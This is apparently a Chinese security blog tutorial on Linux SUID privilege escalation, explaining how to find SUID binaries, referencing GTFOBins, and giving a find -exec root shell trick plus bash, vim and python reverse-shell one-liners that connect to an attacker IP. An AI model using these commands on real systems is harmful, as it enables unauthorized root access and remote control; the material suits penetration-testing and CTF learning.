Linux SUID提权

原创 于 2025-03-23 12:02:16 发布 · 617 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #服务器 #安全

Linux SUID提权

工具网站:GTFOBins

GTFOBins 是一个专注于 Unix/Linux 系统提权(Privilege Escalation)和权限绕过(Bypass) 的权威开源项目,它收集了大量常见系统程序(如 find、vim、nmap 等)的利用方法,帮助安全研究人员和 CTF 选手快速识别和利用配置不当的程序获取更高权限。

一、查找有SUID权限的文件

1.find / -perm -4000 2>/dev/null
2.find / perm -u=s -type f 2>/dev/null

find /
从根目录 / 开始递归搜索所有文件和目录。

-perm -4000
匹配文件权限模式中的 SUID 位(Set User ID)。

4000
是八进制数值,对应二进制 100 000 000 000,表示 SUID 权限被设置。

-
符号表示“至少包含这些权限”(如 -perm -4000 表示 SUID 必须被设置,其他权限忽略)。

2>/dev/null
将错误输出(如“Permission denied”)重定向到“黑洞”设备 /dev/null,隐藏无权限访问的报错,使结果更清晰。

二、SUID是什么,有什么作用

1.当用户执行一个 SUID 文件时,该程序会以文件所有者的权限运行(如 root)
2.查找到具有SUID权限的文件后,就可以在GTFO上找相应提权方法 (太长了记不住)

常见可滥用SUID程序
find, vim, nmap, bash, more/less, cp, mv

三、如何利用SUID提权

需要借助网站来找payload,不同的命令程序,SUID提权方式不同

1. find

find . -exec /bin/sh ; -quit
通过 find 程序的 -exec 参数启动一个特权 Shell(如 /bin/sh)

find .
从当前目录开始搜索文件(. 表示当前目录)。

-exec /bin/sh \;
-exec 是 find 的参数,用于对搜索到的每个文件执行指定命令(这里是 /bin/sh)。

\; 表示命令结束符(转义分号)。

-quit
让 find 在执行完第一个匹配项后立即退出(避免多次执行命令)。

2.执行命令无回显 连接不稳定 则需进行反弹shell
  • 攻击机监听端口:nc -lvnp 4444 (ip 192.168.1.100:4444)
  • 利用 SUID 的 find 反弹 Shell,靶机:
  • find . -exec bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1' \; -quit
  • vim -c ':!/bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"'
  • python -c 'import socket,os,pty;s=socket.socket();s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
login3389
关注
操作系统升(十九)之Linux-SUID
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 2348
SUID是一种特殊限,设置了suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限。sgid与suid类似,只是执行程序时获得的是文件属组的限。passwd这个命令程序的限设置,它就是设置了suid限的只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义.命令执行者要对该程序文件拥有执行(x)限.命令执行者在执行该程序时获得该程序文件属主的身份.
suidlinux
weixin_68652890的博客
04-15 1142
suid suid(设置用户的id)是Linux中的一种特殊限,当运行具有suid限的二进制文件的时候,使得调用者暂时获得该文件拥有者的限(比如a文件拥有者是root,且被赋予了s限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root限) 除了经常看见的rwx限还有s限 s限,设置使文件在执行阶段具有文件所有者的限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s限,就被称为Set UID,简称为SUID的特殊限。简称为SUID的特殊
linux系统suid
focus on security
05-19 5873
SUID 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
find命令的使用及错误信息过滤
菠萝菠萝哒X
05-01 4561
  在需要查找文件或者文件夹时,find命令总能派上用场。Linux find命令用于在指定的目录下查找文件,不仅可以按照文件名进行文件搜索,还可以根据设置的参数按照文件大小,时间等来搜索文件,并将查找的结果在终端进行显示。其基本语法如下: find [path] [-option] [-exec -ok command]   find的参数很多,常用参数如下: 参数 描述 -name 按文件名查找 -size 按文件大小查找 -user 按文件属主查找 -type 按
Linux————利用SUID
热门推荐
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
Linux:SUID
Elite的博客
03-05 3127
以find命令为例,讲解SUID原理
linux suid
03-16
SUID是一种特殊的限位,当一个可执行文件被设置了SUID位后,它在执行时就会以文件所有者的限来执行,而不是以执行者的限来...为了防止SUID攻击,管理员应该定期检查系统中的SUID文件,并限制它们的使用限。
Linux-01 SUID
最新发布
weixin_45626840的博客
01-14 1197
如果有一个root用户设置了SUID限的可执行文件其后不能直接跟一个命令,或者说不能由用户传参去调用另一个可执行文件,但是其本身又调用了系统中的一个可执行文件,我们可以通过替换这个被调用的可执行文件,达到的目的。root用户设置了SUID的可执行文件,其他用户调用时也是以root限运行,如果这些可执行文件本身又可以调用其他可执行文件,或者可以更改系统的一些配置选项,就可以达到的目的。目录(用户定义的unit文件),不过通常测试人员获取的低限账号是不具备这两个目录的写入限的。
20210411web渗透学习之Linux SUID
qq_45290991的博客
04-13 349
Linux下有很多方式,,我记得之前我写了一篇内核:web渗透学习之Linux内核 内核最好用也是最通杀的“倚天剑”。。但是实战中很难使用……因为对方不是傻子都会打补丁……所以需要的是suid。。测试环境为ubutu15.5 SUIDLinux的一种限机制,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的限。如果拥有SUID限,那么就可以利用系统中的二进制文件和工具来进行root。 就相当于说:我在使用这个文件的时候,我有了root限,,所以一般的思路就
LinuxSUID
mrx56的博客
04-09 5214
什么是SUID 首先Linux文件有u(用户),g(组),o(其他)三个属组和rwx(421)三种默认限与两种附加限 而两种附加限分别是SET位限(suid,sgid)和粘滞位限(sticky)依次表示为sst(421),且分别都只能加在u,g,o属组表示的x(执行)位上。 当设置了x限的同时设置了附加限,则以附加限的小写表示,反之大写。 设置了SET位限可以获得该文件属主或属组账号对应的身份,粘滞位限可以使其他用户或组拥有写的限但是不能删除操作 而suid就是附加限中的SET
Linuxsuid
2301_76227305的博客
04-02 2105
以上总结的是常见的suid,后续会持续跟新。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Linux Suid
YouthBelief的博客
12-21 830
Suid 原理 SUID(设置用户ID)是一种限类型,它被赋予一个文件,允许用户以其所有者的限执行该文件。Linux二进制文件可以拥有这种类型的限集有很多原因。例如,ping实用程序需要root限才能打开网络套接字,但它也需要由标准用户执行,以验证与其他主机的连通性。 但是,如果某些现有的二进制文件和实用程序具有 SUID 限,则它们可用于将升为 root。 suid限 表示 chmod u+s 如下 二进制文件以 root 限执行,因为它们的限中包含“ s ”,并且它们归 roo
SUID
snowlyzz的博客
08-14 1961
久经不衰的SUID
SUID
一只web狗
07-01 1万+
SUID介绍
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值